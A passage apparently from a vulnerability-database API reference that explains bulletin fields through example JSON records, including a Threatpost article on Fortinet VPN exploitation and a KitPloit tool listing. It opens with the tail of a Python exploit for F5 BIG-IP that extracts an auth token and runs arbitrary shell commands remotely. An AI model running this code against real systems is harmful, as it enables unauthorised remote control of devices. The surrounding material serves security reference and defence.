\nprint('(-) Not vuln...') \nexit(0) \nexcept Exception: \nprint('ERROR Connect') \nprint('(+) Extract token: %s'%(response.text.split('\"selfLink\":\"https://localhost/mgmt/shared/authz/tokens/')[1].split('\"}')[0])) \nwhile True: \ncmd = input(\"(:CMD)> \") \nheaders = { \n\"Content-Type\": \"application/json\", \n\"X-F5-Auth-Token\": \"%s\"%(response.text.split('\"selfLink\":\"https://localhost/mgmt/shared/authz/tokens/')[1].split('\"}')[0]) \n} \ndata_json = { \n\"command\": \"run\", \n\"utilCmdArgs\": \"-c \\'%s\\'\"%(cmd) \n} \nexp_url= url + '/mgmt/tm/util/bash' \nexp_req = requests.post(exp_url, headers=headers, json=data_json, verify=False, timeout=15) \nif exp_req.status_code == 200 and 'commandResult' in exp_req.text: \nprint(exp_req.text.split('commandResult\":\"')[1].split('\"}')[0].replace('\\\\n', '')) \nelse: \nprint('(-) Not vuln...') \nexit(0) \n \nif __name__ == '__main__': \ntitle() \nif(len(sys.argv) < 2): \nprint('[+] USAGE: python3 %s https://<target_url>\\n'%(sys.argv[0])) \nexit(0) \nelse: \nexploit(sys.argv[1]) \n \n`\n"
}
}
}
}
Example link: FBI: APTs Actively Exploiting Fortinet VPN Bugs
{
"result": "OK",
"data": {
"documents": {
"THREATPOST:2DFBDDFFE3121143D95705C4EA525C7A": {
"id": "THREATPOST:2DFBDDFFE3121143D95705C4EA525C7A",
"type": "threatpost",
"bulletinFamily": "info",
"title": "FBI: APTs Actively Exploiting Fortinet VPN Bugs",
"description": "The FBI and the Cybersecurity and Infrastructure Security Agency are warning that advanced persistent threat (APT) nation-state actors are actively exploiting known security vulnerabilities in the Fortinet FortiOS cybersecurity operating system, affecting the company’s SSL VPN products.\n\nAccording to an alert issued Friday by the FBI and CISA, cyberattackers are scanning devices on ports 4443, 8443 and 10443, looking for unpatched Fortinet security implementations. Specifically, APTs are exploiting CVE-2018-13379, CVE-2019-5591 and CVE-2020-12812.\n\n“It is likely that the APT actors are scanning for these vulnerabilities to gain access to multiple government, commercial and technology services networks,” according to [the alert](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/02/fbi-cisa-joint-advisory-exploitation-fortinet-fortios>). “APT actors have historically exploited critical vulnerabilities to conduct distributed denial-of-service (DDoS) attacks, ransomware attacks, structured query language (SQL) injection attacks, spear-phishing campaigns, website defacements, and disinformation campaigns.”\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe bug tracked as [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>) is a path-traversal issue in Fortinet FortiOS, where the SSL VPN web portal allows an unauthenticated attacker to download system files via specially crafted HTTP resource requests.\n\nThe [CVE-2019-5591](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5591>) flaw is a default-configuration vulnerability in FortiOS that could allow an unauthenticated attacker on the same subnet to intercept sensitive information by impersonating the LDAP server.\n\nAnd finally, [CVE-2020-12812](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12812>) is an improper-authentication vulnerability in SSL VPN in FortiOS, which could allow a user to log in successfully without being prompted for the second factor of authentication (FortiToken) if they changed the case of their username.\n\n“Attackers are increasingly targeting critical external applications – VPNs have been targeted even more this last year,” said Zach Hanley, senior red team engineer at Horizon3.AI, via email. “These three vulnerabilities targeting the Fortinet VPN allow an attacker to obtain valid credentials, bypass multifactor authentication (MFA), and man-in-the-middle (MITM) authentication traffic to intercept credentials.”\n\nHanley added, “The common theme here is: once they are successful, they will look just like your normal users.”\n\nThe bugs are popular with cyberattackers in general, due to Fortinet’s widespread footprint, researchers noted.\n\n“CVE-2018-13379 is a critical vulnerability in the Fortinet FortiOS SSL VPN that has been favored by cybercriminals since exploit details became public in August 2019,” Satnam Narang, staff research engineer at Tenable, said via email. “In fact, Tenable’s 2020 Threat Landscape Retrospective placed it in our Top 5 Vulnerabilities of 2020 because we see threat actors continue to leverage it in the wild, well over a year after it was first disclosed.”\n\nThe FBI and CISA didn’t specify which APTs are mounting the recent activity.\n\n## Initial Compromise & Recon\n\nOnce exploited, the attackers are moving laterally and carrying out reconnaissance on targets, according to officials.\n\n“The APT actors may be using any or all of these CVEs to gain access to networks across multiple critical-infrastructure sectors to gain access to key networks as pre-positioning for follow-on data exfiltration or data encryption attacks,” the warning explained. “APT actors may use other CVEs or common exploitation techniques—such as spear-phishing—to gain access to critical infrastructure networks to pre-position for follow-on attacks.”\n\nThe joint cybersecurity advisory from the FBI and CISA follows last year’s flurry of advisories from U.S. agencies about APT groups using unpatched vulnerabilities to target federal agencies and commercial organizations. For instance, in October [an alert went out](<https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/>) that APTs were using flaws in outdated VPN technologies from Fortinet, Palo Alto Networks and Pulse Secure to carry out cyberattacks on targets in the United States and overseas.\n\n“It’s no surprise to see additional Fortinet FortiOS vulnerabilities like CVE-2019-5591 and CVE-2020-12812 added to the list of known, but unpatched flaws being leveraged by these threat actors,” said Narang. “Over the last few years, SSL VPN vulnerabilities have been an attractive target for APT groups and cybercriminals alike. With the shift to remote work and the increased demand for SSL VPNs like Fortinet and others, the attack surface and available targets have expanded. Organizations should take this advisory seriously and prioritize patching their Fortinet devices immediately if they haven’t done so already.”\n\n## **How Can I Protect My Network from Cyberattacks? **\n\nThe FBI and CISA suggest a range of best practices to help organizations thwart these and other attacks:\n\n * Immediately patch CVEs 2018-13379, 2020-12812 and 2019-5591.\n * If FortiOS is not used by your organization, add key artifact files used by FortiOS to your organization’s execution-deny list. Any attempts to install or run this program and its associated files should be prevented.\n * Regularly back up data, air-gap and password-protect backup copies offline. Ensure copies of critical data are not accessible for modification or deletion from the primary system where the data resides.\n * Implement network segmentation.\n * Require administrator credentials to install software.\n * Implement a recovery plan to restore sensitive or proprietary data from a physically separate, segmented, secure location (e.g., hard drive, storage device, the cloud).\n * Install updates/patch operating systems, software, and firmware as soon as updates/patches are released.\n * Use multifactor authentication where possible.\n * Regularly change passwords to network systems and accounts, and avoid reusing passwords for different accounts. Implement the shortest acceptable timeframe for password changes.\n * Disable unused remote access/Remote Desktop Protocol (RDP) ports and monitor remote access/RDP logs.\n * Audit user accounts with administrative privileges and configure access controls with least privilege in mind.\n * Install and regularly update antivirus and anti-malware software on all hosts.\n * Consider adding an email banner to emails received from outside your organization.\n * Disable hyperlinks in received emails.\n * Focus on awareness and training. Provide users with training on information security principles and techniques, particularly on recognizing and avoiding phishing emails.\n\n**_Check out our free _**[**_upcoming live webinar events_**](<https://threatpost.com/category/webinars/>)**_ – unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * April 21: **Underground Markets: A Tour of the Dark Economy** ([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>))\n\n** **\n",
"published": "2021-04-02T19:56:57",
"modified": "2021-04-02T19:56:57",
"cvss": {
"score": 7.5,
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"
},
"href": "https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/",
"reporter": "Tara Seals",
"references": [
"https://us-cert.cisa.gov/ncas/current-activity/2021/04/02/fbi-cisa-joint-advisory-exploitation-fortinet-fortios",
"https://threatpost.com/newsletter-sign/",
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379",
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5591",
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12812",
"https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/",
"https://threatpost.com/category/webinars/",
"https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar"
],
"cvelist": [
"CVE-2018-13379",
"CVE-2019-5591",
"CVE-2020-12812"
],
"lastseen": "2021-04-02T20:09:09",
"viewCount": 49,
"enchantments": {
"dependencies": {
"references": [
{
"type": "attackerkb",
"idList": [
"AKB:35B88369-C440-49C0-98FF-C50E258FB32C",
"AKB:B54A15A1-8D06-4902-83F9-DC10E40FA81A"
]
},
{
"type": "cve",
"idList": [
"CVE-2018-13379",
"CVE-2020-12812",
"CVE-2019-5591"
]
},
{
"type": "cisa",
"idList": [
"CISA:24BBE0D109CEB29CF9FC28CEA2AD0CFF"
]
},
{
"type": "nessus",
"idList": [
"MACOSX_FORTIOS_FG-IR-18-384.NASL",
"FORTIOS_FG-IR-19-037.NASL",
"FORTIOS_FG-IR-18-384.NASL",
"FORTIOS_FG-IR-18-384_DIRECT.NASL",
"FORTIOS_FG-IR-19-283.NASL"
]
},
{
"type": "packetstorm",
"idList": [
"PACKETSTORM:154147",
"PACKETSTORM:154146"
]
},
{
"type": "kitploit",
"idList": [
"KITPLOIT:763105754466120590",
"KITPLOIT:6516544912632048506",
"KITPLOIT:5397133847150975825",
"KITPLOIT:5563730483162396602",
"KITPLOIT:7070039119688478663",
"KITPLOIT:965198862441671998",
"KITPLOIT:816704453339226193",
"KITPLOIT:3532211766929466258",
"KITPLOIT:5376485594298165648",
"KITPLOIT:5829195600312197311"
]
},
{
"type": "exploitdb",
"idList": [
"EDB-ID:47288",
"EDB-ID:47287"
]
},
{
"type": "zdt",
"idList": [
"1337DAY-ID-33134",
"1337DAY-ID-33133"
]
},
{
"type": "dsquare",
"idList": [
"E-691"
]
},
{
"type": "exploitpack",
"idList": [
"EXPLOITPACK:E222442D181419B052AACE6DA4BC8485",
"EXPLOITPACK:6EF33E509C6C5002F8E81022F84C01B5"
]
},
{
"type": "rapid7blog",
"idList": [
"RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A"
]
},
{
"type": "thn",
"idList": [
"THN:9994A9D5CFB76851BB74C8AD52F3DBBE"
]
},
{
"type": "threatpost",
"idList": [
"THREATPOST:2018FCCB3FFD46BACD36ADBC6C9013CE",
"THREATPOST:71C45E867DCD99278A38088B59938B48",
"THREATPOST:1FB73160B6AAB2B0406816BB6A61E4CB"
]
},
{
"type": "qualysblog",
"idList": [
"QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0"
]
}
],
"modified": "2021-04-02T20:09:09",
"rev": 2
},
"score": {
"value": 5.3,
"vector": "NONE",
"modified": "2021-04-02T20:09:09",
"rev": 2
},
"vulnersScore": 5.3
}
}
}
}
}
Example link: Mole - A Framework For Identifying And Exploiting Out-Of-Band Application Vulnerabilities
{
"result": "OK",
"data": {
"documents": {
"KITPLOIT:5878527601774962255": {
"id": "KITPLOIT:5878527601774962255",
"bulletinFamily": "tools",
"title": "Mole - A Framework For Identifying And Exploiting Out-Of-Band Application Vulnerabilities",
"description": "[  ](<https://1.bp.blogspot.com/-G4SnmIGlQ1g/YE6MCgPm1LI/AAAAAAAAVng/_Ts1qiMQNIQ2n2PWo7PYVmpCvzYo0XjiwCNcBGAsYHQ/s670/OOB.png>)\n\n \n\n\nA framework for identifying and [ exploiting ](<https://www.kitploit.com/search/label/Exploiting> \"exploiting\" ) out-of-band (OOB) vulnerabilities. \n\n \n\n\n** Installation & Setup ** \n \n** Mole Install ** \n\n\nPython >= 3.6 \n\n` virtualenv -p /usr/bin/python3 venv `\n\n` source venv/bin/activate `\n\n` ./venv/bin/pip3 install -r requirements.txt `\n\n` git submodule update --init --recursive `\n\nSet an API key in ` config.yml ` (must be the same for the client and server) \n\n \n** DNS Configuration ** \n\n\nYou'll need to configure the DNS records in your registrar to point to your mole server. Minimally, you'll need an ` A ` record for the name server and an ` NS ` record configured. \n\nMole can be configured to host other configuration options. \n\n \n** Mailgun (Optional) ** \n\n\nMailgun requires DNS entries to enable the service: [ https://help.mailgun.com/hc/en-us/articles/203637190-How-Do-I-Add-or-Delete-a-Domain- ](<https://help.mailgun.com/hc/en-us/articles/203637190-How-Do-I-Add-or-Delete-a-Domain-> \"https://help.mailgun.com/hc/en-us/articles/203637190-How-Do-I-Add-or-Delete-a-Domain-\" )\n\n \n** TLS ** \n\n\nCurrently Mole does not support TLS natively. To implement TLS, use a [ reverse ](<https://www.kitploit.com/search/label/Reverse> \"reverse\" ) proxy such as [ nginx ](<https://docs.nginx.com/nginx/admin-guide/security-controls/terminating-ssl-http/> \"nginx\" ) to terminate the TLS connection and forward [ traffic ](<https://www.kitploit.com/search/label/Traffic> \"traffic\" ) to the Mole server. \n\n \n** Burp Suite Extension ** \n\n\nThe [ Burp Suite Extension ](<https://www.kitploit.com/search/label/Burp%20Suite%20Extension> \"Burp Suite Extension\" ) requires a separate Python 2.7 virtual environment due to the latest version of Jython only supporting 2.7. Below are the instructions for setting up the virtual environment and configuring the Extension. \n\n 1. Create a new python2.7 virtualenv for burp/jython, ` virtualenv -p /usr/bin/python2.7 burp_venv `\n 2. Load the venv, ` source ./burp_venv/bin/activate `\n 3. Install the required packages, ` ./burp_venv/bin/pip -r requirements `\n 4. Configure the Python Environment by downloading and selecting the jython-standalone jar. \n 5. Set the \"Folder for loading modules\" to the full path to ` burp_venv/lib/python2.7/site-packages ` that was created in steps 1-3. \n\n[  ](<https://1.bp.blogspot.com/-53z9NzOrDJo/YE6MWNHzX2I/AAAAAAAAVnk/vjsFi57Qg9YEKk_5xmVQcnd7M4-nSpwjACNcBGAsYHQ/s848/mole_1_burp_python_env.png>)\n\n \n\n\n 4. Click Add \n\n[  ](<https://1.bp.blogspot.com/-uBrtnM3EiHw/YE6Ma0ftquI/AAAAAAAAVns/3ETgB3ZJkuMfH-GuIjL7MGcmdmg-9u8FQCNcBGAsYHQ/s340/mole_2_burp_ext_add_1.png>)\n\n \n\n\n 5. Set the Extension type to ` Python ` and select the ` mole_burp_extension.py ` file from the mole project directory. \n\n[  ](<https://1.bp.blogspot.com/-di2NDO2EU64/YE6MgarjeII/AAAAAAAAVnw/28mwlrkC4ngOnDOfCxSC_qEOpY2CYWoVwCNcBGAsYHQ/s880/mole_3_burp_ext_add_2.png>)\n\n \n\n\n 6. Click Next and if all goes well, there will be no errors on the load screen. \n\n[  ](<https://1.bp.blogspot.com/-YRA2FrXk5Bc/YE6Mk7RCZxI/AAAAAAAAVn0/qBMtUW1YmEwOoGPcLT6zUISOJAMbjO5QACNcBGAsYHQ/s835/mole_4_burp_ext_success.png>)\n\n \n\n\n** Configuration ** \n \n** Token ** \n\n\n` domain ` \\- Your custom domain \n\n` length ` \\- Length of the tokens (default 5) \n\nThe token character set is ascii upper & lower, and digits. The length can be modified to meet needs such as constrained space for a payload. The number of tokens per length is listed below. \n\n * 1 - 62 \n * 2 - 3844 \n * 3 - 238328 \n * 4 - 14776336 \n * 5 - 916132832 \n\n` ssl ` \\- Configure payloads for ` https ` vs ` http `\n\n``server` - domain or IP of the Mole token server \n\n` default_tags ` \\- list of default tags to add to all tokens. Useful for per-project/client tokens. \n\n \n** Server ** \n\n\n` api_key ` \\- API key used to authenticate requests to the mole API \n\n` dns_addr ` \\- IP address used to respond to DNS queries \n\n` db_conn ` \\- [ SQLAlchemy ](<https://www.sqlalchemy.org/> \"SQLAlchemy\" ) [ database URL ](<https://docs.sqlalchemy.org/en/13/core/engines.html> \"database URL\" ) . Default is a SQLite db in the root directory ` sqlite:///mole.db `\n\n` static_responses ` \\- list of DNS static response key/value pairs \n\n` web_port ` \\- configure the listening web port \n\n` dns_port ` -configure the listening dns port \n\n \n** Notifications ** \n\n\nAll notifications have an ` enabled ` flag that determines whether or not to trigger the notification on an interaction. Each notification plugin has its own configuration items. \n\n` mailgun ` \\- configure ` domain ` , ` to ` , ` from ` , and ` api_key ` to enable [ mailgun ](<https://www.mailgun.com/> \"mailgun\" ) email notifications \n\n` slack ` \\- ` token ` and ` channel `\n\n` webhook ` \\- generic POST webhook \n\n \n** Issues/Bugs ** \n\n\nI'm sure there are many, please create a new [ issue ](<https://github.com/ztgrace/mole/issues> \"issue\" ) and fill out the template as best as you can for quick triage. \n\n \n \n\n\n** [ Download Mole ](<https://github.com/ztgrace/mole> \"Download Mole\" ) **\n",
"published": "2021-03-21T11:30:03",
"modified": "2021-03-21T11:30:03",
"cvss": {
"score": 0.0,
"vector": "NONE"
},
"href": "http://www.kitploit.com/2021/03/mole-framework-for-identifying-and.html",
"reporter": "KitPloit",
"references": [
"https://github.com/ztgrace/mole/issues",
"https://github.com/ztgrace/mole"
],
"cvelist": [],
"type": "kitploit",
"lastseen": "2021-03-21T15:30:33",
"edition": 1,
"viewCount": 152,
"enchantments": {
"dependencies": {
"references": [],
"modified": "2021-03-21T15:30:33",
"rev": 2
},
"score": {
"value": -0.1,
"vector": "NONE",
"modified": "2021-03-21T15:30:33",
"rev": 2
},
"vulnersScore": -0.1
},
"toolHref": "https://github.com/ztgrace/mole"
}
}
}
}
title¶
Provides the title of the bulletin, offering a concise summary or description of the security issue, update, or exploit being reported.
Format: String
Examples:
"title": "GHSA-232P-VWFF-86MP vulnerabilities"
"title": "CVE-2024-38077"
"title": "Exploit for Authentication Bypass Using an Alternate Path or Channel in Fortinet Fortiproxy"
description¶
Offers a detailed account of the bulletin, including essential information about the security issue, affected components, impacts, and other relevant details. The text is sanitized to eliminate unnecessary line breaks, tabs, and formatting to ensure clarity and searchability.
Format: String
Examples:
"description": "Vulnerabilities for packages: up, melange, helm, apko, ko, bom, ctop"
"description": "Windows Remote Desktop Licensing Service Remote Code Execution Vulnerability"
"description": "# CVE-2024-55591\n\nA Fortinet FortiOS Authentication Bypass Vulnerable PoC\n\n# Description\n\nUse this poc,you can bypass authentication and see system log\n\n# USEAGE\n\n ... Affected Versions\n\n- FortiOS 7.0.0 through 7.0.16\n- FortiProxy 7.0.0 through 7.0.19\n- FortiProxy 7.2.0 through 7.2.12\n\n"
date¶
published: The date when the bulletin was initially published. modified: Bulletin last modification date. Format: Date YYYY-MM-DD
Format:
- published: ISO 8601 Date (
YYYY-MM-DDTHH:MM:SS
) - modified: ISO 8601 Date (
YYYY-MM-DDTHH:MM:SS
)
Examples:
"published": "2025-01-27T15:17:27", "modified": "2025-01-27T15:17:27"
"published": "2024-07-09T17:15:42", "modified": "2024-12-31T20:36:04"
"published": "2025-01-21T12:30:21", "modified": "2025-01-25T00:43:45"
cvss¶
Represents the Common Vulnerability Scoring System (CVSS) metrics associated with the security bulletin. Multiple CVSS versions (e.g., CVSSv2, CVSSv3, CVSSv4) can be present, but only the latest version is displayed.
Format: Object
- score Format: Float
- vector Format: String
Examples:
"cvss": { "score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C" }
"cvss": { "score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C" }
Structure:
-
cvss
- score: Numerical CVSS score.
- vector: CVSS vector string detailing the vulnerability characteristics.
-
cvss2
- cvss2 Contains CVSSv2 base metrics.
- version: CVSS version (e.g., "2.0").
- vectorString: CVSSv2 vector string.
- accessVector Attack vector (e.g., "NETWORK").
- accessComplexity Attack complexity (e.g., "LOW").
- authentication Required authentication level (e.g., "NONE").
- confidentialityImpact Confidentiality impact (e.g., "PARTIAL").
- integrityImpact Integrity impact (e.g., "PARTIAL").
- availabilityImpact Availability impact (e.g., "PARTIAL").
- baseScore The base CVSSv2 score.
- severity Format: String,
- exploitabilityScore Format: Float,
- impactScore Format: Float,
- acInsufInfo Format: Bool,
- obtainAllPrivilege Format: Bool,
- obtainUserPrivilege Format: Bool,
- obtainOtherPrivilege Format: Bool,
- userInteractionRequired Format: Bool
- cvss2 Contains CVSSv2 base metrics.
-
cvss3
- cvssV3: Contains CVSSv3 base metrics.
- version: CVSS version (e.g., "3.1").
- vectorString: CVSSv3 vector string.
- attackVector: Attack vector (e.g., "NETWORK").
- attackComplexity: Attack complexity (e.g., "LOW").
- privilegesRequired: Privileges required (e.g., "NONE").
- userInteraction: User interaction required (e.g., "NONE").
- scope: Scope of impact (e.g., "UNCHANGED").
- confidentialityImpact: Confidentiality impact (e.g., "HIGH").
- integrityImpact: Integrity impact (e.g., "HIGH").
- availabilityImpact: Availability impact (e.g., "HIGH").
- baseScore: The base CVSSv3 score.
- baseSeverity: CVSSv3 severity rating (e.g., "CRITICAL").
- exploitabilityScore: Exploitability sub-score.
- impactScore: Impact sub-score.
- cvssV3: Contains CVSSv3 base metrics.
-
cvss4
- cvssV4: Contains CVSSv4 base metrics.
- version: CVSS version (e.g., "4.0").
- vectorString: CVSSv4 vector string.
- attackVector: Attack vector (e.g., "NETWORK").
- attackComplexity: Attack complexity (e.g., "LOW").
- privilegesRequired: Privileges required (e.g., "NONE").
- userInteraction: User interaction required (e.g., "NONE").
- scope: Scope of impact (e.g., "UNCHANGED").
- confidentialityImpact: Confidentiality impact (e.g., "HIGH").
- integrityImpact: Integrity impact (e.g., "HIGH").
- availabilityImpact: Availability impact (e.g., "HIGH").
- baseScore: The base CVSSv4 score.
- baseSeverity: CVSSv4 severity rating (e.g., "CRITICAL").
- exploitabilityScore: Exploitability sub-score.
- impactScore: Impact sub-score.
- cvssV4: Contains CVSSv4 base metrics.
Example Structure:
"cvss": { "cvssV4": { "version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 10.0, "baseSeverity": "CRITICAL" }, "exploitabilityScore": 3.9, "impactScore": 6.9 }
Examples
"cvss4": {
"cvssV4": {
"version": "4.0",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/SC:N/VI:L/SI:N/VA:L/SA:N",
"baseScore": 5.1,
"baseSeverity": "MEDIUM",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"privilegesRequired": "HIGH",
"userInteraction": "NONE",
"vulnerableSystemImpactConfidentiality": "LOW",
"subsequentSystemImpactConfidentiality": "NEGLIGIBLE",
"vulnerableSystemImpactIntegrity": "LOW",
"subsequentSystemImpactIntegrity": "NONE",
"vulnerableSystemImpactAvailability": "LOW",
"subsequentSystemImpactAvailability": "NONE"
}
}
"cvss3": {
"cvssV3": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH"
}
}
"cvss2": {
"cvssV2": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"authentication": "NONE",
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"availabilityImpact": "PARTIAL",
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
}
}
Key differences between CVSS versions
Feature | CVSSv2 | CVSSv3 | CVSSv4 |
---|---|---|---|
Version | 2.0 | 3.1 | 4.0 |
Scope | Not present | Present | Present |
User Interaction | Not present | Present | Present |
Privileges Required | Simplified | More detailed | Further refined |
Impact Metrics | Confidentiality, Integrity, Availability | Confidentiality, Integrity, Availability | Confidentiality, Integrity, Availability |
Base Score Range | 0.0 - 10.0 | 0.0 - 10.0 | 0.0 - 10.0 |
Scoring Precision | Limited | Enhanced | Further enhanced |
Vector String Format | Less granular | More granular | Most granular |
Metric Definitions | Basic metrics only | Expanded metrics | Expanded and refined metrics |
Temporal Metrics | Limited | Enhanced | Further enhanced |
Environmental Metrics | Not present | Present | Present |
Attack Vector | Single category | Multiple categories | Expanded categories |
Attack Complexity | Limited options | More options | Most options |
epss¶
EPSS Score of security bulletin. Contains list of EPSS values and percentiles for each CVE mentioned in the document
Format: Object
- cve: The Common Vulnerabilities and Exposures identifier.
- epss: The EPSS score indicating the probability of exploitation.
- percentile: The percentile ranking of the CVSS score within the EPSS distribution.
- modified: The date when the EPSS score was last updated.
Examples:
"epss": [ { "cve": "CVE-2024-38077", "epss": 0.00053, "percentile": 0.23201, "date": "2024-12-17" } ]
href¶
Provides a direct URL to the original source or reference of the bulletin. This link typically points to the vendor advisory, security report, or external resource containing detailed information about the vulnerability or update.
Format: URL (String)
Examples:
"href": "https://packages.wolfi.dev/os/security.json"
"href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2024-38077"
"href": "https://github.com/sysirq/fortios-auth-bypass-poc-CVE-2024-55591"
reporter¶
Identifies the individual or organization that reported or authored the bulletin. This could be the vendor, security researcher, or a security organization responsible for disclosing the vulnerability or update.
Format: String
Examples:
"reporter": "Wolfi"
"reporter": "microsoft"
"reporter": "sysirq"
references¶
Contains an array of URLs that serve as references or sources related to the bulletin. These links may direct to official advisories, detailed vulnerability reports, patches, or other relevant resources.
Format: Array of Strings (URLs)
Examples:
"references": []
"references": [ "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38077" ]
"references": [ "https://lists.fedoraproject.org/archives/list/[email protected]/message/TAPQQZZAT4TG3XVRTAFV2Y3S7OAHFBUP/", "http://www.openwall.com/lists/oss-security/2020/09/17/2", "https://lists.fedoraproject.org/archives/list/[email protected]/message/H4OTFBL6YDVFH2TBJFJIE4FMHPJEEJK3/", "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00080.html", "https://usn.ubuntu.com/4559-1/", "https://lists.debian.org/debian-lts-announce/2020/11/msg00041.html", "https://usn.ubuntu.com/4510-1/", "https://usn.ubuntu.com/4510-2/", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472", "https://www.synology.com/security/advisory/Synology_SA_20_21", "https://security.gentoo.org/glsa/202012-24", "https://lists.fedoraproject.org/archives/list/[email protected]/message/ST6X3A2XXYMGD4INR26DQ4FP4QSM753B/", "http://packetstormsecurity.com/files/159190/Zerologon-Proof-Of-Concept.html", "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00086.html", "http://packetstormsecurity.com/files/160127/Zerologon-Netlogon-Privilege-Escalation.html", "https://www.kb.cert.org/vuls/id/490028" ]
cvelist¶
An array listing all the CVE identifiers addressed or referenced in the bulletin. Each CVE corresponds to a specific vulnerability detailed within the document.
Format: Array of Strings (CVE identifiers)
Examples:
"cvelist": []
"cvelist": [ "CVE-2024-38077" ]
"cvelist": [ "CVE-2024-55591" ]
lastseen¶
Indicates the most recent timestamp when the bulletin was processed or updated by the system. This field is automatically generated and reflects the last time the data was indexed or modified.
Format: ISO 8601 Timestamp (YYYY-MM-DDTHH:MM:SS)
Examples:
"lastseen": "2025-01-27T15:17:27"
"lastseen": "2025-01-16T05:19:37"
"lastseen": "2025-01-26T06:39:55"
affectedSoftware¶
Enumerates the software products affected by the vulnerability described in the bulletin. Each entry specifies the software name and version criteria that determine applicability.
Format: Array of Objects
- cpeName: The Common Platform Enumeration (CPE) identifier for the software.
- name: The official name of the software product.
- operator: The version comparison operator (e.g., "lt" for less than, "eq" for equal).
- version: The version number of the software.
Examples:
"id": "CVE-2024-38077"
"id": "CVE-2019-0230"
Example link: CVE-2024-38077
"affectedSoftware": [
{
"cpeName": "microsoft:windows_server_2008",
"version": "-",
"operator": "eq",
"name": "microsoft windows server 2008"
},
{
"cpeName": "microsoft:windows_server_2008",
"version": "r2",
"operator": "eq",
"name": "microsoft windows server 2008"
},
{
"cpeName": "microsoft:windows_server_2012",
"version": "-",
"operator": "eq",
"name": "microsoft windows server 2012"
},
{
"cpeName": "microsoft:windows_server_2012",
"version": "r2",
"operator": "eq",
"name": "microsoft windows server 2012"
},
{
"cpeName": "microsoft:windows_server_2016",
"version": "10.0.14393.7159",
"operator": "lt",
"name": "microsoft windows server 2016"
},
{
"cpeName": "microsoft:windows_server_2019",
"version": "10.0.17763.6054",
"operator": "lt",
"name": "microsoft windows server 2019"
},
{
"cpeName": "microsoft:windows_server_2022",
"version": "10.0.20348.2582",
"operator": "lt",
"name": "microsoft windows server 2022"
},
{
"cpeName": "microsoft:windows_server_2022_23h2",
"version": "10.0.25398.1009",
"operator": "lt",
"name": "microsoft windows server 2022 23h2"
}
]
Example link: CVE-2019-0230
"affectedSoftware": [
{
"cpeName": "oracle:financial_services_data_integration_hub",
"name": "oracle financial services data integration hub",
"operator": "eq",
"version": "8.0.3"
},
{
"cpeName": "oracle:financial_services_data_integration_hub",
"name": "oracle financial services data integration hub",
"operator": "eq",
"version": "8.0.6"
},
{
"cpeName": "apache:struts",
"name": "apache struts",
"operator": "le",
"version": "2.5.20"
},
{
"cpeName": "oracle:financial_services_market_risk_measurement_and_management",
"name": "oracle financial services market risk measurement and management",
"operator": "eq",
"version": "8.0.6"
}
]
affectedPackage¶
Lists the specific software packages impacted by the vulnerability. Each entry includes details about the package name, version, architecture, and comparison operator to define affected versions.
Format: Array of Objects
- OS: The operating system associated with the package.
- OSVersion: The version of the operating system.
- arch: The architecture of the package (e.g., "x86", "x64", "noarch").
- packageVersion: The version of the package that is affected.
- packageFilename: The filename of the package, if applicable.
- operator: The version comparison operator (e.g., "lt" for less than, "eq" for equal).
- packageName: The name of the affected software package.
Examples:
"id": "WOLFI:GHSA-232P-VWFF-86MP"
"id": "UB:CVE-2019-0230"
Example link: GHSA-232P-VWFF-86MP
"affectedPackage": [
{
"OS": "Wolfi",
"OSVersion": "unknown",
"arch": "x86_64",
"packageVersion": "0.7.3-r1",
"packageFilename": "apko-0.7.3-r1.apk",
"operator": "le",
"packageName": "apko"
},
{
"OS": "Wolfi",
